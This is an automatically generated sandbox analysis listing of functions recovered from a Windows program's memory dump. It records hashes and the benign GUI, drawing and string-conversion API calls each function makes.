Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EnumException@8FamiliesFontH_prolog3ReleaseThrow_memset_strcpy_s_strlen
String ID: MS UI Gothic
API String ID: 820125098-1905310704
Opcode ID: 3a5e953190c6501e4aabe876381918289f5f2024da3dba92aa669a2648fabcd3
Instruction ID: a2fdf7aa5dd40a6bf713148e727848d56f0c536da79671e5fc8fbf0eac8adee2
Opcode Fuzzy Hash: 3a5e953190c6501e4aabe876381918289f5f2024da3dba92aa669a2648fabcd3
Instruction Fuzzy Hash: A5018872901158BFCB11EBA5DC49FEEBBBCEB49750F14005AF805E3241DA74AE02C7A6

Function 00C436F8 Relevance: 12.2, APIs: 8, Instructions: 239windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C43727
IsWindowVisible.USER32(?), ref: 00C43736
GetWindowRect.USER32(?,?), ref: 00C43788
IsZoomed.USER32(?), ref: 00C43797
SetWindowRgn.USER32(?,00000000,00000001), ref: 00C43804
_memset.LIBCMT ref: 00C43824
GetSystemMetrics.USER32(00000004), ref: 00C4386E
_memset.LIBCMT ref: 00C4393F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Visible_memset$MetricsRectSystemZoomed
String ID:
API String ID: 3274878110-0
Opcode ID: 7de665a0cf049a6651942281d65579da554639219e17397db7af4d10c42aa7be
Instruction ID: 99aac04946d155e80b9ad429b7ca45abce1bba38f6e1e0330844c28727fee1b7
Opcode Fuzzy Hash: 7de665a0cf049a6651942281d65579da554639219e17397db7af4d10c42aa7be
Instruction Fuzzy Hash: 86913AB1E002589FCF14DFA9C984BAEBBB9FF88700F14416AF915AB255C7709A41CF61

Function 00C317B1 Relevance: 12.2, APIs: 8, Instructions: 204windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C317B8
EnterCriticalSection.KERNEL32(00D3420C,00000014,00C12398,?,?,00000000,00000000,00000000,00000000), ref: 00C317DD
SelectObject.GDI32(?,00000014), ref: 00C318CC
LeaveCriticalSection.KERNEL32(00D3420C,00000020,?,00000014,00C12398,?,?,00000000,00000000,00000000,00000000), ref: 00C318EB
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00C3190E
SelectObject.GDI32(00000000), ref: 00C3191D
CreateCompatibleDC.GDI32(00000000), ref: 00C319A7
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C319C7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
String ID:
API String ID: 4255533662-0
Opcode ID: 8b1b1ad0260777b893bf1a18c2a17b1d53fb73e22ef203c4a90911f366b24bea
Instruction ID: 7759259629bd78068125961609eef8cdb2e567b5eab38858f1d6517b60e5986c
Opcode Fuzzy Hash: 8b1b1ad0260777b893bf1a18c2a17b1d53fb73e22ef203c4a90911f366b24bea
Instruction Fuzzy Hash: 7471D530620B01CFCB31DF65C891A6AB7E1FF44714F298A2DE866D7290EB30E941CB56

Function 00C3C504 Relevance: 12.2, APIs: 8, Instructions: 167COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C3C551
ScreenToClient.USER32(?,?), ref: 00C3C55E
PtInRect.USER32(?,?,?), ref: 00C3C571
GetCursorPos.USER32(?), ref: 00C3C5AF
ScreenToClient.USER32(?,?), ref: 00C3C5BC
PtInRect.USER32(?,?,?), ref: 00C3C5CF
InflateRect.USER32(?,?,?), ref: 00C3C6BE
RedrawWindow.USER32(?,?,00000000,00000401), ref: 00C3C6D5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientCursorScreen$InflateRedrawWindow
String ID:
API String ID: 4131952207-0
Opcode ID: e0a77a163c86d977cbd382491f2ee048d8d7e13ef32d3ded6e2e076338551f78
Instruction ID: 29eda3159f9927a84ade61724781707eecff6f1d198b91c50d90130a99030228
Opcode Fuzzy Hash: e0a77a163c86d977cbd382491f2ee048d8d7e13ef32d3ded6e2e076338551f78
Instruction Fuzzy Hash: BA516C71A10204EFCF11DFA5C8C5EAD77B9FF48310F2481AAE819EA155EB31AA45DF21

Function 00C388CA Relevance: 12.1, APIs: 8, Instructions: 149windowCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 00C388FA
IsWindow.USER32(?), ref: 00C3891B
DestroyWindow.USER32(?), ref: 00C3892B
GetParent.USER32(?), ref: 00C38947
IsRectEmpty.USER32(?), ref: 00C389F3
IsWindowVisible.USER32(?), ref: 00C38A35
MapWindowPoints.USER32(?,?,?,00000001), ref: 00C38A4C
SendMessageA.USER32(?,00000202,?,?), ref: 00C38A6B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
String ID:
API String ID: 3509494761-0
Opcode ID: a76c3f076d5ae8f43e46cf1e2fe67645360191210a30aa49c09ac568f483f083
Instruction ID: df9a64af15ef02d507a114a5c20465f76e272a727108aac74f0deb4e12f76d1c
Opcode Fuzzy Hash: a76c3f076d5ae8f43e46cf1e2fe67645360191210a30aa49c09ac568f483f083
Instruction Fuzzy Hash: 50517A302103459FDF15EF64C889BBA37B6AF45341F4800B9F91ADF1A6DB719A08DB61

Function 00C2039B Relevance: 12.1, APIs: 8, Instructions: 146windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00C203E4
ScreenToClient.USER32(00000000,?), ref: 00C20429
SendMessageA.USER32(?,0000102C,00000000,00000003), ref: 00C20467
SetCapture.USER32(?), ref: 00C2048D
ReleaseCapture.USER32 ref: 00C204C8
ScreenToClient.USER32(?,?), ref: 00C204E7
GetSystemMetrics.USER32(00000044), ref: 00C20522
GetSystemMetrics.USER32(00000045), ref: 00C2053E

Part of subcall function 00C1F955: SendMessageA.USER32(00C203CB,00001018,00000000,00000000), ref: 00C1F961

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CaptureClientMessageMetricsScreenSendSystem$FocusRelease
String ID:
API String ID: 3871486171-0
Opcode ID: 99ca396cca1449ef96884900a62f9b9183990cad4de955876b3f18a392d2868e
Instruction ID: 25db0a2311f2cd8d750c9abb4d56afbb84928bbc68b65364dbc4a8e569811783
Opcode Fuzzy Hash: 99ca396cca1449ef96884900a62f9b9183990cad4de955876b3f18a392d2868e
Instruction Fuzzy Hash: 9B516E71A00615AFCB10DF78D884A9EBBF5EF14310F20852AF6A9D7661DB70A981DF50

Function 00CB502C Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CB5033
EqualRect.USER32(?,?), ref: 00CB5052
EqualRect.USER32(?,?), ref: 00CB5063
CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 00CB50B3
CreateRectRgn.GDI32(?,00000000,?,?), ref: 00CB50E6
CreateRectRgnIndirect.GDI32(?), ref: 00CB50F2
SetWindowRgn.USER32(?,?,00000000), ref: 00CB5119
RedrawWindow.USER32(?,00000000,00000000,00000105,00D32258,?,?,?,00000001,00000058), ref: 00CB5191

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Create$EqualWindow$H_prolog3IndirectRedraw
String ID:
API String ID: 1234839666-0
Opcode ID: 5a63077c127f780446c53802cc1d30504347e2d2ce96c493d68e30ca3b0c1b98
Instruction ID: 90fd4671e62b7917bf328ac1d1ac81ba28408551f80d7c3ab91ac85086f9a58d
Opcode Fuzzy Hash: 5a63077c127f780446c53802cc1d30504347e2d2ce96c493d68e30ca3b0c1b98
Instruction Fuzzy Hash: 2851277190065AAFDF05DFA8C995FEF7BB9BF04300F004159B815AB255DB70AA06CBA1

Function 00BDF1BC Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BDF1FF
BeginDeferWindowPos.USER32(00000008), ref: 00BDF217
GetTopWindow.USER32(?), ref: 00BDF22C
GetDlgCtrlID.USER32(00000000), ref: 00BDF23B
SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 00BDF26D
GetWindow.USER32(00000000,00000002), ref: 00BDF276
CopyRect.USER32(?,?), ref: 00BDF294
EndDeferWindowPos.USER32(00000000), ref: 00BDF30B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: 2a75f7c0c6a46691ae6ac70fef8b63c19a7284670d9a4bbaeffa9588f9c68e12
Instruction ID: 99ee8215270b633736d7187ad87738d95bc3542e4924833f0874e5852eb799fb
Opcode Fuzzy Hash: 2a75f7c0c6a46691ae6ac70fef8b63c19a7284670d9a4bbaeffa9588f9c68e12
Instruction Fuzzy Hash: 4651087590421A9FCF11DFA8D884AEDFBF9FF49310B1541AAF806AA210E7319941CF65

Function 00BED60C Relevance: 12.1, APIs: 8, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 00C39867: ReleaseCapture.USER32 ref: 00C39895
Part of subcall function 00C39867: IsWindow.USER32(?), ref: 00C398B9
Part of subcall function 00C39867: DestroyWindow.USER32(?), ref: 00C398C9

SetRectEmpty.USER32(?), ref: 00BED63F
ReleaseCapture.USER32 ref: 00BED645
SetCapture.USER32(?), ref: 00BED654
GetCapture.USER32 ref: 00BED696
ReleaseCapture.USER32 ref: 00BED6A6
SetCapture.USER32(?), ref: 00BED6B5
RedrawWindow.USER32(?,?,?,00000505), ref: 00BED720
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 00BED75F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Capture$Window$Release$Redraw$DestroyEmptyRect
String ID:
API String ID: 2209428161-0
Opcode ID: 31218f43a23cfe7d62cddfb6050d06b7fa5bc4563215e243cb23f6718fbca098
Instruction ID: b9b571a4fef8ac5381e94cb62a7ea018d8a675176ea5e4d9b1fb6a4ff11bfc11
Opcode Fuzzy Hash: 31218f43a23cfe7d62cddfb6050d06b7fa5bc4563215e243cb23f6718fbca098
Instruction Fuzzy Hash: 5B414D71200A809FD724AB76D889F5B7BE5FF84711F25069DE46A8B2A1DB70EC018B51

Function 00C27426 Relevance: 12.1, APIs: 8, Instructions: 109windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C2746A
InvalidateRect.USER32(?,00000000,00000001), ref: 00C274AB
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00C274F8
GetParent.USER32(?), ref: 00C27507
SendMessageA.USER32(?,00000111,?,?), ref: 00C2753D
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 00C2755B
UpdateWindow.USER32(?), ref: 00C27564
ReleaseCapture.USER32 ref: 00C27573

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
String ID:
API String ID: 2465089168-0
Opcode ID: 57ed83c4ad15b6fd7e54bb8d2a05b1d8a4a944ab985233045692e16e46625440
Instruction ID: 4b07b8d2406f7324d4477de864376512d3b872492b229d2771c4dd45816b7fef
Opcode Fuzzy Hash: 57ed83c4ad15b6fd7e54bb8d2a05b1d8a4a944ab985233045692e16e46625440
Instruction Fuzzy Hash: 7C410770904B54EFCB21DF65D884AABFBF9FF89301F100A2EE49A96220D7756940DF51

Function 00C5060B Relevance: 12.1, APIs: 8, Instructions: 107windowCOMMON

Download Yara Rule

APIs

MessageBeep.USER32(000000FF), ref: 00C5066C
ReleaseCapture.USER32 ref: 00C506A3
GetClientRect.USER32(?,?), ref: 00C506CE
MapWindowPoints.USER32(?,?,?,00000002), ref: 00C506E7
GetCursorPos.USER32(?), ref: 00C506F7
ScreenToClient.USER32(?,?), ref: 00C50704
PtInRect.USER32(?,?,?), ref: 00C50714
SendMessageA.USER32(?,00000203,?,?), ref: 00C50730

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientMessageRect$BeepCaptureCursorPointsReleaseScreenSendWindow
String ID:
API String ID: 1719883865-0
Opcode ID: 4b04d500754868c88c73b6d9b3d1d5995ddc32a83711638582ab4697901e855e
Instruction ID: 8beb47168fa436fb5fc39969e9bf82ea8ace73e229148fb7e8051cd35bb9f16c
Opcode Fuzzy Hash: 4b04d500754868c88c73b6d9b3d1d5995ddc32a83711638582ab4697901e855e
Instruction Fuzzy Hash: F0418E75500206EFCB24DF65C888AAEBBB5FF48302F20452DF96AD7161CB30A994CF55

Function 00C32872 Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C32879
CreateCompatibleDC.GDI32(?), ref: 00C328CE
CreateCompatibleDC.GDI32(?), ref: 00C328DC
SelectObject.GDI32(00000000,?), ref: 00C328FB
SelectObject.GDI32(?,?), ref: 00C32910
BitBlt.GDI32(00000000,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C32937
SelectObject.GDI32(00000000,?), ref: 00C32948
SelectObject.GDI32(?,?), ref: 00C32955

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreate$H_prolog3
String ID:
API String ID: 2106698553-0
Opcode ID: dc9c11fc37915f050094f5572cd6e3677ade8fe817036f38f62b1fdf16cf15b8
Instruction ID: 1904e09b89bbe6a17c4b925fb605ce723134cda34b307c782fbc738508799813
Opcode Fuzzy Hash: dc9c11fc37915f050094f5572cd6e3677ade8fe817036f38f62b1fdf16cf15b8
Instruction Fuzzy Hash: BE413672800249EFCF11EFA1CD81AEEFBB9FF18310F20846DE55662251DB706A45DB60

Function 00C2D9B1 Relevance: 12.1, APIs: 8, Instructions: 102windowtimeCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C2DA4B
SendMessageA.USER32(?,00000111,?,?), ref: 00C2DA79
IsWindow.USER32(?), ref: 00C2DA88
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00C276DD,?,?,?), ref: 00C2DA98
IsWindow.USER32(?), ref: 00C2DAA8
ReleaseCapture.USER32 ref: 00C2DAB6
KillTimer.USER32(?,00000001,?,?,?,?,?,00C276DD,?,?,?), ref: 00C2DACF
SendMessageA.USER32(?,0000041C,00000000,00000000), ref: 00C2DAEE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$MessageSend$CaptureKillParentRedrawReleaseTimer
String ID:
API String ID: 3014619129-0
Opcode ID: 7cf0da8356a02b73ce073511aa673e67fdc172f47a7ab14c1b26a4ede57b9f45
Instruction ID: 59fe3cb6778b028baf4a93fa4829abb0611cd62c51ec83ef830bfe11f750ffd8
Opcode Fuzzy Hash: 7cf0da8356a02b73ce073511aa673e67fdc172f47a7ab14c1b26a4ede57b9f45
Instruction Fuzzy Hash: 8A316E31A04B50EFD731AB399844BABFAF5FB94701F14092EE0AB56550EB716A40EF12

Function 00BFB87F Relevance: 12.1, APIs: 8, Instructions: 100COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00BFB89C
GetParent.USER32(?), ref: 00BFB8B3
GetClientRect.USER32(?,?), ref: 00BFB941
MapWindowPoints.USER32(?,?,?,00000002), ref: 00BFB954
PtInRect.USER32(?,?,?), ref: 00BFB964

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientRect$ParentPointsScreenWindow
String ID:
API String ID: 1402249346-0
Opcode ID: 36056fe7e06ed7d66361a0d2c9546ce8b497c16c7956b52057a637db0870507b
Instruction ID: e4c5af898d364348dcad446fbf96eb4a8877e5c659eb257635f85f52d95c7381
Opcode Fuzzy Hash: 36056fe7e06ed7d66361a0d2c9546ce8b497c16c7956b52057a637db0870507b
Instruction Fuzzy Hash: FA312A72600609AFCB11DFA5CC89DBEBBF9FB48350B604069F646D7220EB71A9049B61

Function 00BE9815 Relevance: 12.1, APIs: 8, Instructions: 98COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00BE9838
_memset.LIBCMT ref: 00BE9868
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000000), ref: 00BE9880
GetACP.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BE9892
WideCharToMultiByte.KERNEL32(00000000), ref: 00BE989B
_memset.LIBCMT ref: 00BE98B7
GetACP.KERNEL32(00000000,?,000000FF,?,?,00000000,00000000), ref: 00BE98CD
WideCharToMultiByte.KERNEL32(00000000), ref: 00BE98D0

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ByteCharMultiWide$_memset
String ID:
API String ID: 3545102435-0
Opcode ID: 6795f5814ef009259f2419e540780fde6e0c97fd47eaac870bff31bbba65c05d
Instruction ID: 7e1feee92c05c2ab45ffd23e988b1579f79b6b80bdac45d7d9246a64e2c8c4e1
Opcode Fuzzy Hash: 6795f5814ef009259f2419e540780fde6e0c97fd47eaac870bff31bbba65c05d
Instruction Fuzzy Hash: 3821D632401159BFCF15AFA6CC4ACDFBFADFF497A0B100555F518922A1D7319A20DBA1

Function 00BD43A4 Relevance: 12.1, APIs: 8, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00BD43AE
GlobalDeleteAtom.KERNEL32(?), ref: 00BD4459
GlobalDeleteAtom.KERNEL32(?), ref: 00BD446C
_free.LIBCMT ref: 00BD449E
_free.LIBCMT ref: 00BD44A6
_free.LIBCMT ref: 00BD44AE
_free.LIBCMT ref: 00BD44B6
_free.LIBCMT ref: 00BD44BE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: _free$AtomDeleteGlobal$H_prolog3_catch_
String ID:
API String ID: 1844215989-0
Opcode ID: 382d8da57ca2120ea2f54b599041f177f6f5646cb88868557c696be93f553952
Instruction ID: 340e7a6d0b636d2bd7cc8144d6a60d6a3ebadaced8972056cd3e9c58b88cbbec
Opcode Fuzzy Hash: 382d8da57ca2120ea2f54b599041f177f6f5646cb88868557c696be93f553952
Instruction Fuzzy Hash: C1311C706407409FCB14AF64C5A9F29BBE1FF04700F5544AEE19A8B762DB719C80DB51

Function 00BD635E Relevance: 12.1, APIs: 8, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 00BD6370
GetMenuItemCount.USER32(?), ref: 00BD6378
GetSubMenu.USER32(?,-00000001), ref: 00BD6395
GetMenuItemCount.USER32(00000000), ref: 00BD63A5
